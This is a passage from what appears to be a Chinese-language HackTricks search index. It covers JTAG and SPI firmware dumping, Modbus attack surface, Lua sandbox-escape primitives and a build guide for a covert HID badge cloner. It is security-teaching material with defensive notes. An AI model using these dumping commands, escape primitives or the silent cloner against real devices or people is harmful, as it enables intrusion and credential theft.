学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » Radio » Get Bits","id":"10290","title":"Get Bits"},"10291":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 HackTricks","breadcrumbs":"Hardware Hacking » JTAG » JTAG","id":"10291","title":"JTAG"},"10292":{"body":"JTAGenum 是一个可以加载到兼容Arduino的MCU或(实验性地)Raspberry Pi上的工具,用于暴力破解未知的JTAG引脚排列,甚至枚举指令寄存器。 Arduino:将数字引脚D2–D11连接到最多10个可疑的JTAG垫/测试点,并将Arduino GND连接到目标GND。除非你知道电源轨是安全的,否则单独为目标供电。优先使用3.3 V逻辑(例如,Arduino Due),或在探测1.8–3.3 V目标时使用电平转换器/串联电阻。 Raspberry Pi:Pi构建暴露的可用GPIO较少(因此扫描速度较慢);请查看repo以获取当前引脚图和限制。 一旦刷写完成,打开115200波特率的串口监视器并发送h以获取帮助。典型流程: l 查找环回以避免误报 r 如有需要,切换内部上拉电阻 s 扫描TCK/TMS/TDI/TDO(有时还包括TRST/SRST) y 暴力破解IR以发现未记录的操作码 x 引脚状态的边界扫描快照 如果找到有效的TAP,你将看到以FOUND!开头的行,表示发现的引脚。 提示 始终共享接地,切勿将未知引脚驱动到高于目标Vtref。如果有疑问,请在候选引脚上添加100–470 Ω的串联电阻。 如果设备使用SWD/SWJ而不是4线JTAG,JTAGenum可能无法检测到;尝试SWD工具或支持SWJ‑DP的适配器。","breadcrumbs":"Hardware Hacking » JTAG » JTAGenum","id":"10292","title":"JTAGenum"},"10293":{"body":"首先使用万用表识别Vtref和GND。许多适配器需要Vtref来设置I/O电压。 电平转换:优先使用为推挽信号设计的双向电平转换器(JTAG线路不是开漏)。避免为JTAG使用自动方向的I2C转换器。 有用的适配器:FT2232H/FT232H板(例如,Tigard)、CMSIS‑DAP、J‑Link、ST‑LINK(特定于供应商)、ESP‑USB‑JTAG(在ESP32‑Sx上)。至少连接TCK、TMS、TDI、TDO、GND和Vtref;可选连接TRST和SRST。","breadcrumbs":"Hardware Hacking » JTAG » 更安全的引脚探测和硬件设置","id":"10293","title":"更安全的引脚探测和硬件设置"},"10294":{"body":"OpenOCD是JTAG/SWD的事实上的开源软件。使用支持的适配器,你可以扫描链并读取IDCODE: 使用J‑Link的通用示例: openocd -f interface/jlink.cfg -c \\"transport select jtag; adapter speed 1000\\" \\\\\\n-c \\"init; scan_chain; shutdown\\" ESP32‑S3 内置 USB‑JTAG(无需外部探头): openocd -f board/esp32s3-builtin.cfg -c \\"init; scan_chain; shutdown\\" 笔记 如果您得到“全1/全0” 
IDCODE,请检查接线、电源、Vtref,以及端口是否被保险丝/选项字节锁定。 请参阅 OpenOCD 低级 irscan/drscan 以在启动未知链时手动进行 TAP 交互。","breadcrumbs":"Hardware Hacking » JTAG » 与OpenOCD的首次接触(扫描和IDCODE)","id":"10294","title":"与OpenOCD的首次接触(扫描和IDCODE)"},"10295":{"body":"一旦识别了 TAP 并选择了目标脚本,您可以停止核心并转储内存区域或内部闪存。示例(调整目标、基地址和大小): 初始化后的通用目标: openocd -f interface/jlink.cfg -f target/stm32f1x.cfg \\\\\\n-c \\"init; reset halt; mdw 0x08000000 4; dump_image flash.bin 0x08000000 0x00100000; shutdown\\" RISC‑V SoC(在可用时优先选择SBA): openocd -f interface/ftdi/ft232h.cfg -f target/riscv.cfg \\\\\\n-c \\"init; riscv set_prefer_sba on; halt; dump_image sram.bin 0x80000000 0x20000; shutdown\\" ESP32‑S3,通过 OpenOCD 辅助程序进行编程或读取: openocd -f board/esp32s3-builtin.cfg \\\\\\n-c \\"program_esp app.bin 0x10000 verify exit\\" Tips 使用 mdw/mdh/mdb 在长时间转储之前检查内存的完整性。 对于多设备链,在非目标设备上设置 BYPASS 或使用定义所有 TAP 的板文件。","breadcrumbs":"Hardware Hacking » JTAG » 停止 CPU 并转储内存/闪存","id":"10295","title":"停止 CPU 并转储内存/闪存"},"10296":{"body":"即使 CPU 调试访问被锁定,边界扫描仍可能被暴露。使用 UrJTAG/OpenOCD 你可以: SAMPLE 在系统运行时快照引脚状态(查找总线活动,确认引脚映射)。 EXTEST 驱动引脚(例如,通过 MCU 位翻转外部 SPI 闪存线路,如果板子接线允许的话,可以离线读取)。 使用 FT2232x 适配器的最小 UrJTAG 流程: jtag> cable ft2232 vid=0x0403 pid=0x6010 interface=1\\njtag> frequency 100000\\njtag> detect\\njtag> bsdl path /path/to/bsdl/files\\njtag> instruction EXTEST\\njtag> shift ir\\njtag> dr 您需要设备 BSDL 以了解边界寄存器位的顺序。请注意,一些供应商在生产中锁定边界扫描单元。","breadcrumbs":"Hardware Hacking » JTAG » 边界扫描技巧 (EXTEST/SAMPLE)","id":"10296","title":"边界扫描技巧 (EXTEST/SAMPLE)"},"10297":{"body":"ESP32‑S3/C3 包含原生 USB‑JTAG 桥接器;OpenOCD 可以直接通过 USB 进行通信,无需外部探头。这对于初步检查和转储非常方便。 RISC‑V 调试 (v0.13+) 得到了 OpenOCD 的广泛支持;当核心无法安全停止时,优先使用 SBA 进行内存访问。 许多 MCU 实现了调试认证和生命周期状态。如果 JTAG 看起来无响应但电源正常,设备可能被熔断到封闭状态或需要经过认证的探头。","breadcrumbs":"Hardware Hacking » JTAG » 现代目标和注意事项","id":"10297","title":"现代目标和注意事项"},"10298":{"body":"在生产中永久禁用或锁定 JTAG/SWD(例如,STM32 RDP 级别 2,ESP eFuses 禁用 PAD JTAG,NXP/Nordic APPROTECT/DPAP)。 在保持制造访问的同时,要求经过认证的调试(ARMv8.2‑A ADIv6 调试认证,OEM 管理的挑战-响应)。 不要布线简单的测试垫;埋藏测试通孔,移除/填充电阻以隔离 TAP,使用带键控或弹簧针夹具的连接器。 
上电调试锁:在早期 ROM 后面对 TAP 进行门控,以强制执行安全启动。","breadcrumbs":"Hardware Hacking » JTAG » 防御和加固(在真实设备上预期的内容)","id":"10298","title":"防御和加固(在真实设备上预期的内容)"},"10299":{"body":"OpenOCD 用户指南 – JTAG 命令和配置。 https://openocd.org/doc-release/html/JTAG-Commands.html Espressif ESP32‑S3 JTAG 调试(USB‑JTAG,OpenOCD 使用)。 https://docs.espressif.com/projects/esp-idf/en/latest/esp32s3/api-guides/jtag-debugging/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » JTAG » 参考文献","id":"10299","title":"参考文献"},"103":{"body":"Wake On Lan 用于通过 网络消息 来 启动 计算机。用于启动计算机的 magic packet 只是一个包含 MAC Dst 的数据包,然后它在同一数据包内被 重复 16 次 。 这类数据包通常通过 ethernet 0x0842 或 UDP packet to port 9 发送。 如果未提供 [MAC] ,数据包将发送到 broadcast ethernet (广播 MAC 将是被重复的那个)。 bash # Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)\\nwol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0842\\nwol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9","breadcrumbs":"Pentesting Network » Wake On Lan","id":"103","title":"Wake On Lan"},"1030":{"body":"在 _G 枚举期间,特别注意查找: io, os: io.popen, os.execute, file I/O, env access. load, loadstring, loadfile, dofile: 执行源代码或 bytecode;支持加载不受信任的 bytecode。 package, package.loadlib, require: 动态库加载和模块接口。 debug: setfenv/getfenv (≤5.1), getupvalue/setupvalue, getinfo, and hooks. LuaJIT-only: ffi.cdef, ffi.load to call native code directly. 
Minimal usage examples (if reachable): lua -- Execute source/bytecode\\nlocal f = load(\\"return 1+1\\")\\nprint(f()) -- 2 -- loadstring is alias of load for strings in 5.1\\nlocal bc = string.dump(function() return 0x1337 end)\\nlocal g = loadstring(bc) -- in 5.1 may run precompiled bytecode\\nprint(g()) -- Load native library symbol (if allowed)\\nlocal mylib = package.loadlib(\\"./libfoo.so\\", \\"luaopen_foo\\")\\nlocal foo = mylib()","breadcrumbs":"Lua Sandbox Escape » 在侦察期间要搜索的危险原语","id":"1030","title":"在侦察期间要搜索的危险原语"},"10300":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » SPI » SPI","id":"10300","title":"SPI"},"10301":{"body":"SPI(串行外设接口)是一种用于嵌入式系统的同步串行通信协议,用于IC(集成电路)之间的短距离通信。SPI通信协议利用主从架构,由时钟和芯片选择信号进行协调。主从架构由一个主设备(通常是微处理器)管理外部外设,如EEPROM、传感器、控制设备等,这些外设被视为从设备。 多个从设备可以连接到一个主设备,但从设备之间不能相互通信。从设备由两个引脚管理,时钟和芯片选择。由于SPI是一种同步通信协议,输入和输出引脚遵循时钟信号。芯片选择由主设备用于选择一个从设备并与之交互。当芯片选择为高时,从设备未被选择,而当其为低时,芯片已被选择,主设备将与从设备进行交互。 MOSI(主输出,从输入)和MISO(主输入,从输出)负责数据发送和接收。数据通过MOSI引脚发送到从设备,同时芯片选择保持为低。输入数据包含指令、内存地址或根据从设备供应商的数据表的数据。在有效输入后,MISO引脚负责将数据传输到主设备。输出数据在输入结束后的下一个时钟周期准确发送。MISO引脚在数据完全传输完毕之前会继续传输数据,或者主设备将芯片选择引脚设为高(在这种情况下,从设备将停止传输,主设备在下一个时钟周期后将不再接收)。","breadcrumbs":"Hardware Hacking » SPI » 基本信息","id":"10301","title":"基本信息"},"10302":{"body":"转储固件对于分析固件和发现其中的漏洞非常有用。很多时候,固件在互联网上不可用或由于型号、版本等因素的变化而无关紧要。因此,直接从物理设备提取固件在寻找威胁时可以非常有帮助。 获取串行控制台可能会很有帮助,但很多时候文件是只读的。这由于各种原因限制了分析。例如,发送和接收数据包所需的工具可能不在固件中。因此,提取二进制文件进行逆向工程是不可行的。因此,将整个固件转储到系统中并提取二进制文件进行分析可能非常有帮助。 此外,在红队活动和获取设备的物理访问权限时,转储固件可以帮助修改文件或注入恶意文件,然后将其重新闪存到内存中,这可能有助于在设备中植入后门。因此,通过固件转储可以解锁许多可能性。","breadcrumbs":"Hardware Hacking » SPI » 
从EEPROM中转储固件","id":"10302","title":"从EEPROM中转储固件"},"10303":{"body":"该设备是一个廉价的工具,用于从EEPROM中转储固件,并使用固件文件重新闪存。这是处理计算机BIOS芯片(实际上就是EEPROM)的热门选择。该设备通过USB连接,并需要最少的工具即可开始使用。此外,它通常能快速完成任务,因此在物理设备访问中也很有帮助。 drawing 将EEPROM内存与CH341a编程器连接,并将设备插入计算机。如果设备未被检测到,请尝试在计算机上安装驱动程序。此外,请确保EEPROM以正确的方向连接(通常,将VCC引脚放置在与USB连接器相反的方向),否则软件将无法检测到芯片。如有需要,请参考图示: drawing drawing 最后,使用flashrom、G-Flash(GUI)等软件转储固件。G-Flash是一个快速的最小GUI工具,能够自动检测EEPROM。这在需要快速提取固件时非常有帮助,而无需过多调整文档。 drawing 转储固件后,可以对二进制文件进行分析。可以使用strings、hexdump、xxd、binwalk等工具提取有关固件以及整个文件系统的大量信息。 要从固件中提取内容,可以使用binwalk。Binwalk分析十六进制签名并识别二进制文件中的文件,并能够提取它们。 binwalk -e 可以是 .bin 或 .rom,具体取决于使用的工具和配置。 caution 请注意,固件提取是一个精细的过程,需要大量的耐心。任何处理不当都可能导致固件损坏甚至完全擦除,使设备无法使用。建议在尝试提取固件之前研究特定设备。","breadcrumbs":"Hardware Hacking » SPI » CH341A EEPROM编程器和读取器","id":"10303","title":"CH341A EEPROM编程器和读取器"},"10304":{"body":"请注意,即使 Pirate Bus 的引脚图指示用于连接 SPI 的 MOSI 和 MISO 引脚,某些 SPI 可能将引脚标记为 DI 和 DO。 MOSI -> DI, MISO -> DO 在 Windows 或 Linux 上,您可以使用程序 flashrom 来转储闪存内容,运行类似以下命令: bash # In this command we are indicating:\\n# -VV Verbose\\n# -c The chip (if you know it better, if not, don\'tindicate it and the program might be able to find it)\\n# -p In this case how to contact th chip via the Bus Pirate\\n# -r Image to save in the filesystem\\nflashrom -VV -c \\"W25Q64.V\\" -p buspirate_spi:dev=COM3 -r flash_content.img tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » SPI » Bus Pirate + flashrom","id":"10304","title":"Bus Pirate + flashrom"},"10305":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Industrial Control Systems Hacking » 工业控制系统黑客技术","id":"10305","title":"工业控制系统黑客技术"},"10306":{"body":"本节包含有关工业控制系统的所有内容,包括概念以及利用各种安全问题进行黑客攻击的方法。 工业控制系统无处不在,因为工业对国家的经济发展至关重要。但这些ICS难以更新,且在该领域的进展较少。因此,发现安全漏洞在这里很常见。这里使用的大多数协议和标准是在90年代开发的,与当前的攻击场景相比,能力较弱。 保护这些系统变得重要,因为破坏它们可能会造成巨大的经济损失,甚至在最坏的情况下危及生命。要理解工业控制系统的安全性,了解它们的内部结构是必要的。 由于工业控制系统是按照设定标准安装的,了解每个组件将有助于将控制系统中的其他机制互联。像PLC和SCADA系统这样的设备在不同工业中的安装方式各异,因此信息收集至关重要。 工业控制系统有时可能会很复杂,因此在进行任何操作时需要大量耐心。在计划攻击和开发任何漏洞之前,所有的工作都是关于探测和侦察。 这些技术也可以用于保护工业控制系统免受攻击和进行蓝队防御。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Industrial Control Systems Hacking » 关于本节","id":"10306","title":"关于本节"},"10307":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » Modbus协议","id":"10307","title":"Modbus协议"},"10308":{"body":"Modbus协议是工业自动化和控制系统中广泛使用的协议。Modbus允许可编程逻辑控制器(PLC)、传感器、执行器和其他工业设备之间的通信。理解Modbus协议至关重要,因为这是ICS中使用最广泛的通信协议,并且具有大量的潜在攻击面,可以进行嗅探甚至向PLC注入命令。 在这里,概念以要点形式陈述,提供协议及其操作性质的背景。ICS系统安全的最大挑战是实施和升级的成本。这些协议和标准是在80年代和90年代早期设计的,至今仍被广泛使用。由于一个行业有很多设备和连接,升级设备非常困难,这使得黑客在处理过时协议时占据了优势。对Modbus的攻击几乎是不可避免的,因为它将在没有升级的情况下使用,而其操作对行业至关重要。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » Modbus协议简介","id":"10308","title":"Modbus协议简介"},"10309":{"body":"Modbus协议通常用作客户端-服务器架构,其中主设备(客户端)与一个或多个从设备(服务器)发起通信。这也被称为主从架构,广泛用于电子和物联网中,如SPI、I2C等。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » 客户端-服务器架构","id":"10309","title":"客户端-服务器架构"},"1031":{"body":"当 load/loadstring/loadfile 可达但 io/os 受限时,执行精心构造的 Lua bytecode 可能导致内存泄露和破坏原语。要点: Lua ≤ 5.1 随附了一个 bytecode verifier,该 verifier 有已知的 bypasses。 Lua 5.2 完全移除了该 verifier(官方立场:应用应直接拒绝 precompiled chunks),如果不禁止 bytecode loading 则扩大了攻击面。 典型工作流:通过 in-VM 输出 leak 指针,构造 bytecode 以制造 type confusions(例如围绕 FORLOOP 或其他 opcodes),然后枢转为 arbitrary read/write 或 native code execution。 此路径依赖于引擎/版本并需 RE。详见参考以获取深入分析、利用原语和在游戏中的示例 gadgetry。","breadcrumbs":"Lua Sandbox Escape » 可选升级:abusing Lua bytecode loaders","id":"1031","title":"可选升级:abusing Lua bytecode loaders"},"10310":{"body":"Modbus协议设计用于串行通信和以太网通信。串行通信在遗留系统中广泛使用,而现代设备支持以太网,提供更高的数据传输速率,更适合现代工业网络。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » 串行和以太网版本","id":"10310","title":"串行和以太网版本"},"10311":{"body":"数据在Modbus协议中以ASCII或二进制形式传输,尽管由于与旧设备的兼容性,通常使用二进制格式。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » 数据表示","id":"10311","title":"数据表示"},"10312":{"body":"ModBus协议通过传输特定的功能代码来操作PLC和各种控制设备。这部分很重要,因为重放攻击可以通过重新传输功能代码来实现。遗留设备不支持任何数据传输加密,通常有长电缆连接,这导致这些电缆被篡改和捕获/注入数据。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » 
功能代码","id":"10312","title":"功能代码"},"10313":{"body":"网络中的每个设备都有一些唯一地址,这对于设备之间的通信至关重要。像Modbus RTU、Modbus TCP等协议用于实现寻址,并作为数据传输的传输层。传输的数据是Modbus协议格式,包含消息。 此外,Modbus还实现了错误检查,以确保传输数据的完整性。但最重要的是,Modbus是一个开放标准,任何人都可以在其设备中实现。这使得该协议成为全球标准,并在工业自动化行业中广泛应用。 由于其大规模使用和缺乏升级,攻击Modbus提供了显著的优势,具有广泛的攻击面。ICS高度依赖设备之间的通信,任何对它们的攻击都可能对工业系统的操作造成危险。如果攻击者识别出传输媒介,可以进行重放、数据注入、数据嗅探和泄露、拒绝服务、数据伪造等攻击。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Industrial Control Systems Hacking » Modbus Protocol » Modbus的寻址","id":"10313","title":"Modbus的寻址"},"10314":{"body":"Reading time: 1 minute tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » 无线电黑客","id":"10314","title":"无线电黑客"},"10315":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 构建便携式 HID MaxiProx 125 kHz 移动克隆器","id":"10315","title":"构建便携式 HID MaxiProx 125 kHz 移动克隆器"},"10316":{"body":"将一个主电源供电的 HID MaxiProx 5375 长距离 125 kHz 读卡器转变为一个可在现场部署的、由电池供电的徽章克隆器,能够在物理安全评估期间静默收集接近卡。 这里的转换基于 TrustedSec 的“让我们克隆一个克隆器 - 第 3 部分:将一切结合在一起”研究系列,结合了机械、电气和射频方面的考虑,以便最终设备可以放入背包并立即在现场使用。 warning 操作主电源供电的设备和锂离子电源银行可能是危险的。在通电电路之前,请验证每个连接,并保持天线、同轴电缆和接地平面与工厂设计完全一致,以避免调谐失效。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 目标","id":"10316","title":"目标"},"10317":{"body":"HID MaxiProx 5375 读卡器(或任何 12 V HID Prox® 长距离读卡器) ESP RFID Tool v2.2(基于 ESP32 的 Wiegand 嗅探器/记录器) USB-PD(电源传输)触发模块,能够协商 12 V @ ≥3 A 100 W USB-C 电源银行(输出 12 V PD 配置文件) 26 AWG 硅胶绝缘连接线 - 红/白 面板安装 SPST 切换开关(用于蜂鸣器杀开关) NKK AT4072 开关保护盖/防意外盖 焊接铁、焊锡吸取带和除焊泵 ABS 级手动工具:锯、刀、平头和半圆锉 钻头 1/16″(1.5 mm)和 1/8″(3 mm) 3 M VHB 双面胶带和扎带","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 材料清单 (BOM)","id":"10317","title":"材料清单 (BOM)"},"10318":{"body":"拆除并移除用于生成 5 V 逻辑 PCB 的工厂降压转换器子板。 在 ESP RFID Tool 旁边安装 USB-PD 触发器,并将触发器的 USB-C 插口引导到外壳外部。 PD 触发器从电源银行协商 12 V,并直接供电给 MaxiProx(读卡器原生期望 10–14 V)。从 ESP 板获取一个次级 5 V 电源轨以供电任何配件。 100 W 电池组紧贴内部支撑安装,以确保 没有 电源线悬挂在铁氧体天线附近,从而保持射频性能。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 1. 电源子系统","id":"10318","title":"1. 电源子系统"},"10319":{"body":"找到 MaxiProx 逻辑板上的两个扬声器焊盘。 清理 两个 焊盘,然后仅重新焊接 负 焊盘。 将 26 AWG 线(白色 = 负,红色 = 正)焊接到蜂鸣器焊盘,并通过新切割的槽引导到面板安装的 SPST 开关。 当开关打开时,蜂鸣器电路被切断,读卡器在完全静默中操作 - 适合隐秘的徽章收集。 在切换开关上安装 NKK AT4072 弹簧加载安全盖。小心地用锯/锉扩大孔径,直到它卡在开关主体上。保护盖防止在背包内意外激活。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 2. 蜂鸣器杀开关 - 静音操作","id":"10319","title":"2. 
蜂鸣器杀开关 - 静音操作"},"1032":{"body":"Server side:拒绝或重写用户脚本;白名单安全 API;移除或绑定为空 io、os、load/loadstring/loadfile/dofile、package.loadlib、debug、ffi。 Client side:以最小 _ENV 运行 Lua,禁止 bytecode loading,重新引入严格的 bytecode verifier 或签名校验,并阻止客户端进程创建子进程。 Telemetry:在脚本加载后不久对 gameclient → child process creation 发出告警;与 UI/chat/script 事件做关联分析。","breadcrumbs":"Lua Sandbox Escape » 检测与加固说明(供防御者)","id":"1032","title":"检测与加固说明(供防御者)"},"10320":{"body":"• 使用平头剪刀,然后用刀和锉 去除 内部 ABS “凸起”,使大型 USB-C 电池平放在支撑上。 • 在外壳壁上雕刻两个平行通道以容纳 USB-C 电缆;这将电池锁定到位并消除移动/振动。 • 为电池的 电源 按钮创建一个矩形开口: 在位置上贴上纸质模板。 在四个角钻 1/16″ 导向孔。 用 1/8″ 钻头扩大孔。 用锯连接孔;用锉修整边缘。 ✱ 避免使用旋转 Dremel - 高速钻头会熔化厚 ABS 并留下难看的边缘。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 3. 外壳与机械工作","id":"10320","title":"3. 外壳与机械工作"},"10321":{"body":"重新安装 MaxiProx 逻辑板,并重新焊接 SMA 尾线到读卡器的 PCB 地面焊盘。 使用 3 M VHB 安装 ESP RFID Tool 和 USB-PD 触发器。 用扎带整理所有电线,保持电源线 远离 天线环。 拧紧外壳螺丝,直到电池轻微压缩;内部摩擦防止在每次读取卡片后设备发生位移。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 4. 最终组装","id":"10321","title":"4. 最终组装"},"10322":{"body":"使用 125 kHz Pupa 测试卡,便携式克隆器在自由空气中实现了 ≈ 8 cm 的一致读取 - 与主电源供电操作相同。 将读卡器放置在薄壁金属现金箱内(模拟银行大堂桌子)将范围减少到 ≤ 2 cm,确认大金属外壳作为有效的射频屏蔽。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 5. 范围与屏蔽测试","id":"10322","title":"5. 
范围与屏蔽测试"},"10323":{"body":"充电 USB-C 电池,连接电池,并翻转主电源开关。 (可选)打开蜂鸣器保护盖,在台式测试时启用声音反馈;在隐秘现场使用前锁定。 走过目标徽章持有者 - MaxiProx 将激活卡片,ESP RFID Tool 捕获 Wiegand 流。 通过 Wi-Fi 或 USB-UART 转储捕获的凭据,并根据需要重放/克隆。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 使用工作流程","id":"10323","title":"使用工作流程"},"10324":{"body":"症状 可能原因 修复 读卡器在卡片呈现时重启 PD 触发器协商了 9 V 而不是 12 V 验证触发器跳线/尝试更高功率的 USB-C 电缆 无读取范围 电池或电线放置在 天线 上 重新布线并保持铁氧体环周围 2 cm 的间隙 蜂鸣器仍然鸣叫 开关接在正极而不是负极 移动杀开关以切断 负 扬声器线路","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 故障排除","id":"10324","title":"故障排除"},"10325":{"body":"让我们克隆一个克隆器 - 第 3 部分 (TrustedSec) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Maxiprox Mobile Cloner » 参考文献","id":"10325","title":"参考文献"},"10326":{"body":"Reading time: 15 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
